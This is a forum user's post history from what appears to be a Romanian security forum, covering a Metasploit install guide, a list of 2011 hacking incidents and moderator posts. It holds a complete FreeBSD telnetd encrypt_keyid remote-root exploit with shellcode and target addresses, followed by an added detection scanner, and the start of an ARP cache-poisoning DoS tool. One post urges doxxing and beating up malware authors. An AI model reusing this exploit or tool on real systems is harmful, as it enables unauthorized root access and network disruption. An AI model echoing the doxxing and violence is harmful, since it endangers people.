Everything posted by Nytro

  1. x86/x64 Instruction Set Reference This is an unofficial online version of the Intel 64 instruction set reference. It provides a list of the available instructions for IA-32 and Intel 64 microprocessors, their assembly mnemonics, encodings, descriptions, pseudo code and the exceptions they can throw. This information is largely compatible with AMD64 processors, except for some minor differences. Link: http://siyobik.info/main/reference
  2. Guide to Installing Metasploit 4 and Armitage on Mac OSX Lion
     12-26-11

     After many hours of trial and error, I have been able to put together a guide to getting Metasploit 4 and Armitage working properly on Mac OSX. I would also like to give a tremendous amount of credit to BrianCanFixIT @ Faulty Logic. His blog post on setting up Armitage helped me through the missing piece of getting the PostgreSQL database up and running properly.

     [h=3]Prerequisites[/h]
     Install XCode (I am running v4.2)

     [h=3]PostgreSQL Installation[/h]
     Download and install PostgreSQL via the free GUI installer.
     Set up your root PostgreSQL password during installation.
     Launch the newly installed PGAdmin III application.
     Connect (double click) on the local PostgreSQL database and enter your root password when prompted.
     Under the PostgreSQL drop down, right click on “Login Roles”, and select “New Login Role”.
     Set the role name to msfuser.
     Click on the definition tab, and set the password as msfpassword. Click OK to continue.
     Next, right click on the databases list, and select “New Database”.
     Set the name to metasploitdb, and set the owner to msfuser.
     Press OK, and we’re done. You can close PGAdmin.

     [h=3]MacPorts[/h]
     Download and install MacPorts from http://www.macports.org/install.php
     Good Tip: add “/opt/local” to your spotlight privacy settings to avoid excessive compile times & unnecessary indexing by spotlight. (System Preferences->Spotlight->Privacy->”+”)
     Quit terminal & relaunch to accept new path settings added by MacPorts

     [h=3]Install Ruby, RubyGems (PostgreSQL and MsgPack)[/h]
     # Run as Root
     sudo bash
     # Update MacPorts
     port selfupdate
     # Install Ruby
     port install ruby19 +nosuffix
     # Install PostgreSQL gem connector (64bit Systems)
     env ARCHFLAGS='-arch x86_64' gem install pg -- --with-opt-include=/Library/PostgreSQL/9.1/include/ --with-opt-lib=/Library/PostgreSQL/9.1/lib/
     # Install Ruby Msgpack
     port install msgpack
     # Install the gem MSGPACK
     gem install msgpack
     # Add Ruby to your path
     export PATH=/opt/msf3:$PATH
     # Ensure that /opt/local/bin appears before /usr/bin, else edit ~/.bash_profile file and source it
     echo $PATH

     [h=3]Metasploit 4 Installation[/h]
     # Download Metasploit via Subversion
     sudo svn co https://www.metasploit.com/svn/framework3/trunk/ /opt/local/msf/
     # Create a system link to the msf applications
     # This is done because including it in your path configuration doesn't seem to work.
     sudo ln -s /opt/local/msf/msf* /opt/local/bin

     [h=3]Configure the Metasploit Database[/h]
     # Create the configuration directory
     sudo mkdir /opt/local/config
     # Create/Edit the following file
     sudo vi /opt/local/config/database.yml
     # Include the following in your database.yml file

     # These settings are for the database used by the Metasploit Framework
     # unstable tree included in this installer, not the commercial editions.
     #
     production:
       adapter: "postgresql"
       database: "metasploitdb"
       username: "msfuser"
       password: "msfpassword"
       port: 5432
       host: "localhost"
       pool: 256
       timeout: 5

     [h=3]Running Metasploit and Armitage[/h]
     # Include the database location in your config
     export MSF_DATABASE_CONFIG=/opt/local/config/database.yml
     # Launch Metasploit
     sudo msfrpcd -U msfuser2 -P msfpassword2 -t Msg
     # Launch Armitage
     sudo armitage

     [h=3]Enjoy![/h]

     Source: http://www.nightlion.net/guides/2011/guide-to-installing-metasploit-4-and-armitage-on-mac-osx-lion/
  3. Android App permissions
     THESE AREN’T THE PERMISSIONS YOU’RE LOOKING FOR
     Anthony Lineberry, David Luke Richardson, Tim Wyatt
     DefCon 18
       • Android Internals Overview
       • Security/Permission Model
       • Why Ask For Permission When You Can Ask For Forgiveness?
       • Log-Cat – Our Inside Mole
       • The Ultimate Permission (Yes, we’re talking about root)
       • Mitigation
     Download: https://www.defcon.org/images/defcon-18/dc-18-presentations/Lineberry/DEFCON-18-Lineberry-Not-The-Permissions-You-Are-Looking-For.pdf
  4. Top 10 hacking scandals of 2011
     Sonakshi Babbar, Hindustan Times
     New Delhi, December 27, 2011

     As more and more celebrities join the social networking bandwagon, they also become increasingly vulnerable to hacking. From heads of states to Hollywood celebrities, this year saw a series of hacking incidents involving high-profile victims. Check out the most controversial ones.

     Selena Gomez
     Selena Gomez's Twitter and Facebook fans woke up to an uncharacteristic post about her boyfriend Justin Bieber. The venomous post screamed "Oh yeah, JUSTIN BIEBER SUCKS!!!!!!!". The teen singer immediately clarified that it was a case of hacking and she had nothing to do with the post.

     Ashton Kutcher
     Hollywood star Ashton Kutcher, who used to host the celebrity prank show, Punk'd, got a taste of his medicine when his Twitter account @aplusk was hacked. A tweet sent to his followers said, "Ashton, you've been Punk'd. This account is not secure. Dude, where's my SSL?"

     Kim Kardashian
     Kim Kardashian went into a panic mode when her Twitter account was hacked by internet pranksters this year. On discovering fake tweets posted by an imposter, the socialite appealed to bosses of the site to help restore the security on her account.

     Sony PlayStation
     In one of the biggest data breaches, Sony admitted to an external intrusion which exposed personal information of 77 million PlayStation Network users. The PlayStation maker warned users that the hackers might have access to customers' vital information, including names, birthdates, physical and e-mail addresses, and logins, handles and credit card details.

     Research in Motion
     Hackers defaced a website belonging to Blackberry maker Research in Motion soon after the company revealed its plans to support police investigating the London riots. The hackers posted on the blog: "No Blackberry you will NOT assist the police." Blackberry took off the blog briefly and restored it to its original form.

     Facebook
     In one of the most shocking security breach incidents, around two lakh Facebook accounts were hacked in Bangalore. The users' photos and videos were morphed and the sleazy links mailed to friends and families overnight.

     Lady Gaga
     A scam on Lady Gaga's Facebook page fooled many fans into clicking the link to win an iPad. The contest rules and registration were presented as a link to a Blogspot page. "Lady Gaga's new iPad comes out in 3 days! So for the next 72 hours we will be hosting a massive giveaway to all the Mother Monster fans. Sign up and receive your special Lady Gaga edition iPad in time for the Holidays!" hackers posted on her Facebook page. The presence of the fake iPad offer didn't go unnoticed, and was taken down within an hour.

     Nicolas Sarkozy
     Hackers played a cruel joke on French President Nicolas Sarkozy when they posted a fake resignation letter from his Facebook page. The post, which went out to more than 350,000 'friends' of the head of the state read like this: "Dear compatriots, given the exceptional circumstances our country is experiencing, I have decided in my spirit and conscience not to run for office again at the end of my mandate in 2012".

     Yingluck Shinawatra
     Thailand's Prime Minister, Yingluck Shinawatra, fell victim to the hacking menace when her Twitter account was hacked. Her followers received tweets criticizing her political experience and incompetence. The tweets also suggested that she was her brother's (former Prime Minister - Thaksin Shinawatra) puppet.

     Fox News
     While celebrities and popular figures have been the target of hackers, it was media house Fox News who faced their ire in July this year. In a gruesome joke, the hackers tweeted the death of president Obama. Some of the tweets read like this: "@BarackObama has just passed. The President is dead. A sad 4th of July, indeed. President Barack Obama is dead." This was followed by more on the same lines claiming that Obama was shot at a restaurant while campaigning.

     Source: Top 10 hacking scandals of 2011 - Hindustan Times
  5. Bixxtonim and HJOCONCEPT95 - both banned. PS: I don't follow these topics.
  6. Boss, analysing a piece of malware does not take 30 seconds. Analysing a file takes a long time, and I am not going to spend half an hour each time checking some crap program, like a stealer/crypter or whatever other garbage you people are looking for, because once you come here to download a stealer, crypter, Havij or the like, it is clear that you are just wasting space on this earth, that you are script kiddies with hacker airs and you have no business being here. In other words, I don't give a damn that you get infected trying to download who knows what junk program. If you were serious and didn't deal in this kind of crap you would have no problem. Meanwhile you are free to take every crap program from here, from this category, and analyse it. Look at the strings to begin with, check the executable's resources and see whether there is another executable in there, check the sections and see whether you come across a suspicious one, check the import table, scan on VirusTotal and Anubis to begin with, install Wireshark on a virtual machine to see whether it sends data, Process Monitor to see what APIs it calls, Autoruns to see whether it adds itself to startup, GMER anti-rootkit to see whether the thing happens to have a small rootkit, then do a bit of debugging too, check whether from the entry point it does a jmp to who knows what function and then returns to the entry point, take snapshots of the file system and the Registry and check whether anything changes, check whether it runs in a sandbox, disassemble it and see whether Main() checks for the presence of a sandbox/VM, and much more. Then you post a complete summary in the respective topic, you say "Hey loser, look, it's infected because the entry point is actually a jmp to a download-and-execute shellcode", and I delete the download link, move the topic to the trash, and the one who posted it gets a permanent ban.
     You can also make the discovered data public, like "it tries to send mail to vasile@gmail.com", and I can make public for you the e-mail address used here on the forum, or the IPs, and tell you what city he is from. Then, if that person has really upset you, we look him up on Facebook or other sites, find out as much as we can about him and go and beat the hell out of him and his mother too, for making him stupid and wanting to steal our Facebook passwords. But as long as all you have is demands, keep your mouth shut and stop commenting pointlessly; nobody is going to get involved in checking the crap programs posted here. Maybe if it were a serious program, yes, but Havij? If you are good you don't need such a thing, you only need a browser; but being a script kiddie, you deserve to run all the infected programs, because you don't even know what a virtual machine is, or at least a sandbox.
  7. Telnetd encrypt_keyid: Remote Root function pointer overwrite

     /***************************************************************************
      *            telnetd-encrypt_keyid.c
      *
      *  Mon Dec 26 20:37:05 CET 2011
      *  Copyright  2011  Jaime Penalba Estebanez (NighterMan)
      *
      *  nighterman@painsec.com - jpenalbae@gmail.com
      *  Credits to batchdrake as always
      *
      ****************************************************************************/

     /*
      *
      * Usage:
      *
      * $ gcc exploit.c -o exploit
      *
      * $ ./exploit 127.0.0.1 23 1
      * [<] Succes reading intial server request 3 bytes
      * [>] Telnet initial encryption mode and IV sent
      * [<] Server response: 8 bytes read
      * [>] First payload to overwrite function pointer sent
      * [<] Server response: 6 bytes read
      * [>] Second payload to triger the function pointer
      * [*] got shell?
      * uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
      *
      */

     #include <stdio.h>
     #include <stdlib.h>
     #include <string.h>
     #include <unistd.h>
     #include <errno.h>
     #include <sys/time.h>
     #include <sys/socket.h>
     #include <netinet/in.h>
     #include <arpa/inet.h>

     #define MAXKEYLEN 64-1

     struct key_info
     {
         unsigned char keyid[MAXKEYLEN];
         unsigned char keylen[4];
         unsigned char dir[4];
         unsigned char modep[4];
         unsigned char getcrypt[4];
     };

     static unsigned char shellcode[] =
         "\x31\xc0"                 // xor %eax,%eax
         "\x50"                     // push %eax
         "\xb0\x17"                 // mov $0x17,%al
         "\x50"                     // push %eax
         "\xcd\x80"                 // int $0x80
         "\x50"                     // push %eax
         "\x68\x6e\x2f\x73\x68"     // push $0x68732f6e
         "\x68\x2f\x2f\x62\x69"     // push $0x69622f2f
         "\x89\xe3"                 // mov %esp,%ebx
         "\x50"                     // push %eax
         "\x54"                     // push %esp
         "\x53"                     // push %ebx
         "\x50"                     // push %eax
         "\xb0\x3b"                 // mov $0x3b,%al
         "\xcd\x80";                // int $0x80

     static unsigned char tnet_init_enc[] =
         "\xff\xfa\x26\x00\x01\x01\x12\x13"
         "\x14\x15\x16\x17\x18\x19\xff\xf0";

     static unsigned char tnet_option_enc_keyid[] = "\xff\xfa\x26\x07";
     static unsigned char tnet_end_suboption[] = "\xff\xf0";

     /*
      * shell(): semi-interactive shell hack
      */
     static void shell(int fd)
     {
         fd_set fds;
         char tmp[128];
         int n;

         /* check uid */
         write(fd, "id\n", 3);

         /* semi-interactive shell */
         for (;;) {
             FD_ZERO(&fds);
             FD_SET(fd, &fds);
             FD_SET(0, &fds);

             if (select(FD_SETSIZE, &fds, NULL, NULL, NULL) < 0) {
                 perror("select");
                 break;
             }

             /* read from fd and write to stdout */
             if (FD_ISSET(fd, &fds)) {
                 if ((n = read(fd, tmp, sizeof(tmp))) < 0) {
                     fprintf(stderr, "Goodbye...\n");
                     break;
                 }
                 if (write(1, tmp, n) < 0) {
                     perror("write");
                     break;
                 }
             }

             /* read from stdin and write to fd */
             if (FD_ISSET(0, &fds)) {
                 if ((n = read(0, tmp, sizeof(tmp))) < 0) {
                     perror("read");
                     break;
                 }
                 if (write(fd, tmp, n) < 0) {
                     perror("write");
                     break;
                 }
             }
         }

         close(fd);
         exit(1);
     }

     static int open_connection(in_addr_t dip, int dport)
     {
         int pconn;
         struct sockaddr_in cdata;
         struct timeval timeout;

         /* timeout.tv_sec = _opts.timeout; */
         timeout.tv_sec = 8;
         timeout.tv_usec = 0;

         /* Set socket options and create it */
         cdata.sin_addr.s_addr = dip;
         cdata.sin_port = htons(dport);
         cdata.sin_family = AF_INET;

         pconn = socket(AF_INET, SOCK_STREAM, 0);

         if( pconn < 0 )
         {
             printf("Socket error: %i\n", pconn);
             printf("Err message: %s\n", strerror(errno));
             exit(-1);
         }

         /* Set socket timeout */
         if ( setsockopt(pconn, SOL_SOCKET, SO_RCVTIMEO,
                 (void *)&timeout, sizeof(struct timeval)) != 0)
         {
             perror("setsockopt SO_RCVTIMEO: ");
             exit(1);
         }

         /* Set socket options */
         if ( setsockopt(pconn, SOL_SOCKET, SO_SNDTIMEO,
                 (void *)&timeout, sizeof(struct timeval)) != 0)
         {
             perror("setsockopt SO_SNDTIMEO: ");
             exit(1);
         }

         /* Make connection */
         if (connect(pconn,(struct sockaddr *) &cdata, sizeof(cdata)) != 0)
         {
             close(pconn);
             return -1;
         }

         return pconn;
     }

     static void usage(char *arg)
     {
         printf("Telnetd encrypt_keyid exploit for FreeBSD\n");
         printf("NighterMan <nighterman@painsec.com>\n\n");
         printf("Usage: %s [ip] [port] [target]\n", arg);
         printf("Available Targets:\n");
         printf(" - 1: FreeBSD 8.0 & 8.1\n");
         printf(" - 2: FreeBSD 8.2\n\n");
     }

     int main(int argc, char *argv[])
     {
         /* Payload Size */
         int psize = (sizeof(struct key_info) +
                     sizeof(tnet_option_enc_keyid) +
                     sizeof(tnet_end_suboption));

         struct key_info bad_struct;
         unsigned char payload[psize];
         unsigned char readbuf[256];
         int ret;
         int conn;
         int offset = 0;

         if ( argc != 4) {
             usage(argv[0]);
             return -1;
         }

         /* Fill the structure */
         memset(&bad_struct, 0x90, sizeof(struct key_info));
         memcpy(&bad_struct.keyid[20], shellcode, sizeof(shellcode));
         memcpy(bad_struct.keylen, "DEAD", 4);
         memcpy(bad_struct.dir, "BEEF", 4);
         memcpy(bad_struct.modep, "\x6c\x6f\x05\x08", 4); /* Readable address */

         /* Shellcode address (function pointer overwrite) */
         switch (atoi(argv[3])) {
             case 1:
                 memcpy(bad_struct.getcrypt, "\xa6\xee\x05\x08", 4);
                 break;

             case 2:
                 memcpy(bad_struct.getcrypt, "\xed\xee\x05\x08", 4);
                 break;

             default:
                 printf("Bad target\n");
                 return -1;
                 break;
         }

         /* Prepare the payload with the overflow */
         memcpy(payload, tnet_option_enc_keyid, sizeof(tnet_option_enc_keyid));
         offset += sizeof(tnet_option_enc_keyid);
         memcpy(&payload[offset], &bad_struct, sizeof(bad_struct));
         offset += sizeof(bad_struct);
         memcpy(&payload[offset], tnet_end_suboption, sizeof(tnet_end_suboption));

         /* Open the connection */
         conn = open_connection(inet_addr(argv[1]), atoi(argv[2]));
         if (conn == -1) {
             printf("Error connecting: %i\n", errno);
             return -1;
         }

         /* Read initial server request */
         ret = read(conn, readbuf, 256);
         printf("[<] Succes reading intial server request %i bytes\n", ret);

         /* Send encryption and IV */
         ret = write(conn, tnet_init_enc, sizeof(tnet_init_enc));
         if (ret != sizeof(tnet_init_enc)) {
             printf("Error sending init encryption: %i\n", ret);
             return -1;
         }
         printf("[>] Telnet initial encryption mode and IV sent\n");

         /* Read response */
         ret = read(conn, readbuf, 256);
         printf("[<] Server response: %i bytes read\n", ret);

         /* Send the first payload with the overflow */
         ret = write(conn, payload, psize);
         if (ret != psize) {
             printf("Error sending payload first time\n");
             return -1;
         }
         printf("[>] First payload to overwrite function pointer sent\n");

         /* Read Response */
         ret = read(conn, readbuf, 256);
         printf("[<] Server response: %i bytes read\n", ret);

         /* Send the payload again to tigger the function overwrite */
         ret = write(conn, payload, psize);
         if (ret != psize) {
             printf("Error sending payload second time\n");
             return -1;
         }
         printf("[>] Second payload to triger the function pointer\n");

         /* Start the semi interactive shell */
         printf(" [*] got shell?\n");
         shell(conn);

         return 0;
     }

     I was reading about this problem before Christmas; it seems an exploit for telnetd has appeared.

     Source: Telnetd encrypt_keyid: Remote Root function pointer overwrite
     More info: http://thexploit.com/secdev/a-textbook-buffer-overflow-a-look-at-the-freebsd-telnetd-code/
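
A defender's view of the overflow in post 7, as an added example that is not part of the original post or the exploit author's code: a C scanner that walks a captured client-to-server telnet byte stream and counts ENCRYPT key-id suboptions longer than the daemon's key-id buffer. The 64-byte limit, the function names and the constructed sample messages (filler bytes only) are assumptions of this example; the option and subcommand values follow arpa/telnet.h.

```c
#include <stddef.h>
#include <stdio.h>

#define IAC            0xff  /* "interpret as command" */
#define SB             0xfa  /* suboption begin */
#define SE             0xf0  /* suboption end */
#define TELOPT_ENCRYPT 0x26  /* option byte seen in the post's messages */
#define ENC_KEYID      0x07  /* subcommand byte seen in the post's payload header */
#define DEC_KEYID      0x08  /* companion key-id subcommand (arpa/telnet.h) */
#define KEYID_MAX      64    /* assumption: size of the daemon's key-id buffer */

/* Count ENCRYPT ENC_KEYID/DEC_KEYID suboptions whose key id is longer than
 * KEYID_MAX. *longest (optional) receives the longest key id seen.
 * IAC IAC inside a suboption is one literal 0xff; a suboption cut off by the
 * end of the capture is still measured. */
size_t count_oversized_keyids(const unsigned char *buf, size_t len, size_t *longest)
{
    size_t hits = 0, i = 0;
    if (longest) *longest = 0;
    while (i + 2 < len) {
        if (buf[i] != IAC) { i++; continue; }
        if (buf[i + 1] != SB) { i += 2; continue; }     /* IAC IAC or other command */
        unsigned char opt = buf[i + 2];
        size_t j = i + 3, data = 0;
        int sub = -1;                                   /* first suboption byte */
        while (j < len) {
            unsigned char c = buf[j];
            if (c == IAC) {
                if (j + 1 >= len) { j = len; break; }   /* capture ends mid-sequence */
                if (buf[j + 1] == SE) { j += 2; break; } /* end of suboption */
                j += 2;                                 /* escaped 0xff: one data byte */
            } else {
                j++;
            }
            if (sub < 0) sub = c; else data++;
        }
        if (opt == TELOPT_ENCRYPT && (sub == ENC_KEYID || sub == DEC_KEYID)) {
            if (longest && data > *longest) *longest = data;
            if (data > KEYID_MAX) hits++;
        }
        i = j;
    }
    return hits;
}

/* Build a constructed key-id message: IAC SB ENCRYPT ENC_KEYID <n x fill> IAC SE.
 * A fill of 0xff is escaped as IAC IAC. Returns bytes written, 0 if cap is too small. */
size_t build_keyid_msg(unsigned char *out, size_t cap, size_t n, unsigned char fill)
{
    size_t need = 4 + n * (fill == IAC ? 2 : 1) + 2, k = 0;
    if (need > cap) return 0;
    out[k++] = IAC; out[k++] = SB; out[k++] = TELOPT_ENCRYPT; out[k++] = ENC_KEYID;
    for (size_t i = 0; i < n; i++) {
        if (fill == IAC) out[k++] = IAC;
        out[k++] = fill;
    }
    out[k++] = IAC; out[k++] = SE;
    return k;
}

/* Scan one constructed message carrying an n-byte key id. */
size_t hits_for_keyid_len(size_t n, unsigned char fill)
{
    unsigned char m[1200];
    size_t len = build_keyid_msg(m, sizeof m, n, fill);
    return count_oversized_keyids(m, len, NULL);
}

/* Same, but with the trailing IAC SE removed (truncated capture). */
size_t hits_truncated(size_t n)
{
    unsigned char m[1200];
    size_t len = build_keyid_msg(m, sizeof m, n, 0x41);
    return len < 2 ? 0 : count_oversized_keyids(m, len - 2, NULL);
}

/* The ENCRYPT IS negotiation bytes quoted in the post: not a key-id suboption. */
size_t hits_for_post_init_message(void)
{
    static const unsigned char init[] = {
        0xff, 0xfa, 0x26, 0x00, 0x01, 0x01, 0x12, 0x13,
        0x14, 0x15, 0x16, 0x17, 0x18, 0x19, 0xff, 0xf0 };
    return count_oversized_keyids(init, sizeof init, NULL);
}

int main(void)
{
    printf("64-byte key id  : %zu alert(s)\n", hits_for_keyid_len(64, 0x41));
    printf("65-byte key id  : %zu alert(s)\n", hits_for_keyid_len(65, 0x41));
    printf("80 bytes, no SE : %zu alert(s)\n", hits_truncated(80));
    printf("ENCRYPT IS msg  : %zu alert(s)\n", hits_for_post_init_message());
    return 0;
}
```
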
  8. The passwords are not for the e-mail accounts but for the site they were "taken" from. Still, there is a chance that some people use the same password in several places.
  9. The part about "stealing" from frameworks isn't really about stealing, it's more about learning. Those frameworks are usually written by people with many years of experience in the field, and they are often good sources of documentation, sources from which you can learn a lot:
     - code optimisations
     - code layout and documentation
     - professional code writing
  10. Latest updates:
     [h=6]Open Penetration Testing Bookmarks Collection Vulnerability Database Pentagon approved Android to be used by DoD officials STRATFOR leaked accounts (10257 passwords recovered) Lynis Auditing Tool 1.3.0 Ubertooth ARP Cache Poisoning Monkey || ARP Poisoning tool Network Destroyer ARP TCP Flooder [Solution] SQL Injection Control Remote System [SQLi] Intel MySQL 5.5.8 Remote Denial Of Service (DOS) Lighttpd 1.4.30 / 1.5 Denial Of Service[/h]
     [h=6]The Perfect Server - CentOS 6.1 x86_64 With nginx Execute Binary In The Alternate Data Stream [Unix] Install Freebsd 8 in 8 minutes False SQL Injection and Advanced Blind SQL Injection Simple Virtual Machine Untethered jailbreak demonstrated for iOS 5, iOS 5.1 Kaspersky Anti-Virus and Internet Security 2012 Vulnerable to Hackers China Software Developer Network (CSDN) 6 Million user data Leaked The Crypter Blueprint[/h]
     [h=6]Oracle Solaris 11 Kernel Source Leaked HTML5 web security Metasploit on Amazon Kindle Securitytube Metasploit Framework Expert ( Armitage ) Probably the Best Free Security List in the World A simple HTML tag will crash 64-bit Windows 7 Excel formula injection in Google Docs CSS - The sexy assasin Backdoor in Android for No-Permissions Reverse Shell[/h]
     If you are interested in the useful topics on the forum: Like: Romanian Security Team | Facebook http://www.facebook.com/rstforum
  11. It depends on what you mean by that. If you want to learn programming only at a basic level and then start studying frameworks, then YES, it's not exactly OK, in the sense that you won't understand what exactly those frameworks do, how they work. If instead you learn programming well, and you see with your own eyes that you can do yourself what a framework does, you will look at the situation differently; you will start to take optimisations into account, namely that you don't actually need that whole framework and that if you implement part of the framework yourself you can implement it more optimally for your project. Then, since you would know how to do what that framework does, there will be no problem studying the framework's code and taking a few ideas, or even pieces of code, because you would understand them. If from the start, with one line of code, you do what 1000 lines of code would do, you have no idea what is actually happening and you don't have the access you would need either, in case you go straight to frameworks.
  12. ARP Cache Poisoning

     /**
        I do very much enjoy this raw socket network programming. This code could
        and probably should be optimized in several ways, but I tried. Anyway, this
        code is for testing and educational purposes only, yadda yadda yadda...

        The program: Exploits the Address Resolution Protocol (legacy exploit, I know)
        on the whole subnet. Just read the code if you want to know more. If you can't
        read it, then learn how it works before thinking about using it.

        Reasons for compilation/runtime errors: (may be some dumb reasons but you never know...)
        - misconfiguration with your network (/proc/net/route and your NIC need to be configured)
        - you aren't root
        - you aren't even running Linux
        - missing header files (O_o)
        - you are an idiot

        Tested on a private network using Ubuntu Linux on a network with two machines
        running Windows XP and Slackware Linux
     **/

     /** And the Code: **/
     #include <stdio.h>
     #include <stdlib.h>
     #include <string.h>
     #include <sys/socket.h>
     #include <sys/ioctl.h>
     #include <sys/select.h>
     #include <features.h>
     #include <sys/types.h>
     #include <net/if.h>
     #include <net/ethernet.h>
     #include <net/if_arp.h>
     #include <netinet/in.h>
     #include <netinet/ether.h>
     #include <linux/if_packet.h>
     #include <linux/if_ether.h>
     #include <linux/ip.h>
     #include <linux/icmp.h>
     #include <unistd.h>
     #include <arpa/inet.h>
     #include <errno.h>
     #include <netdb.h>
     #include <time.h>
     #include <signal.h>

     #define BROADCAST "ff:ff:ff:ff:ff:ff"
     #define EMPTY "00:00:00:00:00:00"
     #define SPOOF_MAC "00:DE:AD:BE:EF:11"

     /* 14 byte Ethernet Protocol header definition */
     typedef struct EthernetHeader {
         unsigned char destination[6];
         unsigned char source[6];
         unsigned short protocol;
     } EthernetHeader;

     /* 28 byte ARP header */
     typedef struct ArpHeader {
         unsigned short hardware_type;
         unsigned short protocol_type;
         unsigned char hard_addr_len;
         unsigned char prot_addr_len;
         unsigned short opcode;
         unsigned char source_hardware[6];
         unsigned int source_ip;
         unsigned char dest_hardware[6];
         unsigned int dest_ip;
     }__attribute__((__packed__)) ArpHeader;

     /* a data structure to hold whatever information you want to keep track of about each host */
     typedef struct RemoteHost {
         unsigned char mac[6];
         unsigned int ip;
     } RemoteHost;

     int childnotdead;

     /* global variables for SIGNAL access, since you can't really pass any args to a signal handler... */
     unsigned char orig_mac[6];
     struct ifreq ifr_fix;
     int sockfd_fix;

     void createEthHeader(EthernetHeader *ethernet_header, unsigned char *src_mac, unsigned char *dest_mac, int proto) {
         /* set up 14 byte Ethernet header */
         memcpy(ethernet_header->source, src_mac, 6);
         memcpy(ethernet_header->destination, dest_mac, 6);
         ethernet_header->protocol = htons(proto);
     }

     void createArpHeader(ArpHeader *ArpHeader, unsigned char *src_mac, unsigned char *dst_mac, unsigned int src_ip, unsigned int dst_ip, unsigned int opCode) {
         /* set up 28 byte ARP header */
         ArpHeader->hardware_type = htons(ARPHRD_ETHER);
         ArpHeader->protocol_type = htons(ETHERTYPE_IP);
         ArpHeader->hard_addr_len = 6;
         ArpHeader->prot_addr_len = 4;
         ArpHeader->opcode = htons(opCode);
         memcpy(ArpHeader->source_hardware, src_mac, 6);
         ArpHeader->source_ip = src_ip;
         memcpy(ArpHeader->dest_hardware, dst_mac, 6);
         ArpHeader->dest_ip = dst_ip;
     }

     /* byte array to null terminated string, any other method of printing the MAC address was annoying */
     static char * mactos(unsigned char *addr) {
         static char buffer[256];
         sprintf(buffer,"%02x:%02x:%02x:%02x:%02x:%02x",addr[0],addr[1],addr[2],addr[3],addr[4],addr[5]);
         return buffer;
     }

     /* unsigned int to string, easier way to manage different IP address formats IMHO */
     static char * uitos(unsigned int ip) {
         static char bytes[256];
         sprintf(bytes, "%d.%d.%d.%d", (ip >> 24) & 0xFF, (ip >> 16) & 0xFF, (ip >> 8) & 0xFF, (ip >> 0) & 0xFF);
         return bytes;
     }

     /* returns a raw socket file descriptor that listens for packets on the OSI Layer 2 level */
     int createRawSockFd(int protocol) {
         int sockfd;
         if ((sockfd = socket(PF_PACKET, SOCK_RAW, protocol)) < 0) {
             perror("socket");
             exit(-1);
         }
         return sockfd;
     }

     /* binds the raw socket FD to the device given as argument one */
     int bindSock(char *device_name, int sockfd, int protocol) {
         struct sockaddr_ll sll;
         struct ifreq ifr;

         bzero(&sll,sizeof(sll));
         bzero(&ifr,sizeof(ifr));

         /* get the interface index */
         strncpy((char *)ifr.ifr_name, device_name, IFNAMSIZ);
         if ((ioctl(sockfd, SIOCGIFINDEX, &ifr))==-1) {
             printf("Could not get the interface index.\n");
             exit(-1);
         }

         /* bind raw socket to the interface */
         sll.sll_family=AF_PACKET;
         sll.sll_ifindex=ifr.ifr_ifindex;
         sll.sll_protocol=htons(protocol);
         if ((bind(sockfd, (struct sockaddr *)&sll, sizeof(sll)))==-1) {
             printf("bind failed, couldn't bind raw socket to interface.\n");
             exit(1);
         }
         return 1;
     }

     /* really easy to send packets, just write it out to the socket */
     int sendPacket(int sockfd, unsigned char *packet, int packetSize) {
         int bytes = 0;
         if ((bytes = write(sockfd, packet, packetSize)) != packetSize) {
             fprintf(stderr, "could only send %d\\%d bytes of data onto wire\n", bytes, packetSize);
             return 0;
         }
         return 1;
     }

     void printPacket(unsigned char *packet, int packet_len) {
         int i;
         for (i = 0; i < packet_len; i+=2) {
             if (!(i % 16))
                 printf("\n");
             printf("%02x%02x ", packet[i], packet[i+1]);
         }
         printf("\n\n");
     }

     void strip_newline(char *str) {
         int i;
         for (i=0; i<strlen(str); i++)
             if (str[i] == '\n')
                 str[i] = '\0';
     }

     void handler(int sig) {
         childnotdead = 0;
     }

     /* makes sure that I don't get duplicate addresses, my own, or the gateway */
     int validTarget(unsigned int ip, unsigned int localip, unsigned int gatewayip, RemoteHost *hostlist, int curr) {
         int i;
         if ((ip == localip) || (ip == gatewayip))
             return 0;
         for (i = 0; i < curr; i++)
             if (ip == hostlist[i].ip)
                 return 0;
         return 1;
     }

     void banner( void ) {
         printf("\nARP DoS by suid\n\n");
     }

     void fixMAC(int signum) {
         printf("Setting MAC address back to %s\n", mactos(orig_mac));
         memcpy(&ifr_fix.ifr_hwaddr.sa_data, orig_mac, 6);
         if (ioctl(sockfd_fix, SIOCSIFHWADDR, &ifr_fix) < 0) {
             perror("SIOCSIFHWADDR");
             exit(-1);
         }
         exit(signum);
     }

     static char * getAns(char *q) {
         char *ans = (char *)malloc(sizeof(char)*10);
         printf("%s", q);
         fgets(ans, sizeof(ans)-1, stdin);
         strip_newline(ans);
         return ans;
     }

     void removeHosts(struct RemoteHost *host_list, int numhosts) {
         char buff[1024], *token;
         int *hosts = malloc(numhosts), i = 1, j, k = 0;
         RemoteHost *new_host_list;
         int newNumHosts;

         printf("Format: <host0> <host1> <host2> ... <hostn>\n");
         fgets(buff, sizeof(buff)-1, stdin);
         token = strtok(buff, " ");
         hosts[0] = atoi(token);
         while ((token = strtok(NULL, " ")) != NULL) {
             hosts[i] = atoi(token);
             i++;
         }
         newNumHosts = numhosts - i;

         printf("Now removing...\nHosts: ");
         for (j = 0; j < i; j++)
             printf("%s\n", uitos(ntohl(host_list[hosts[j]].ip)));
         printf("\n");

         for (j = 0; j < i; j++)
             host_list[hosts[j]].ip = 0;

         new_host_list = (RemoteHost *)malloc(sizeof(RemoteHost)*newNumHosts);
         for (i = k; i < numhosts; i++)
             if (host_list[i].ip == 0)
                 continue;
             else {
                 new_host_list[k] = host_list[i];
                 k++;
             }
         host_list = new_host_list;
     }

     int main(int argc, char **argv) {
         EthernetHeader *arp_ethernet_header, *ethernet_header_reply;
         ArpHeader *arp_header, *arp_header_reply;
         unsigned int device_in_addr, gateway_in_addr, netmask, subnet, *remote_hosts, numhosts;
         int sockfd, i, zeros, numIfs, ArpPacketSize, pid, bytes, hosts_online;
         unsigned char *ArpPacket, device_mac[6], gateway_mac[6], packet_recv[2048];
         char buff[1024], pbuff[1024], *token, *device_name, answer[3];
         FILE *pipe;
         struct ifreq *ifr, *ifr_item;
         struct ifreq ifr_dat;
         struct ifconf ifc;
         struct sockaddr_in sin, *sin2;
         struct arpreq areq;
         struct timeval tv;
         struct in_addr ipaddr;
         fd_set readfds;
         RemoteHost *remote_host_info;

         banner();

         /* make sure user has root for raw sockets */
         if (getuid() != 0) {
             fprintf(stderr, "This program requires root priviledges to execute!\n");
             exit(-1);
         }
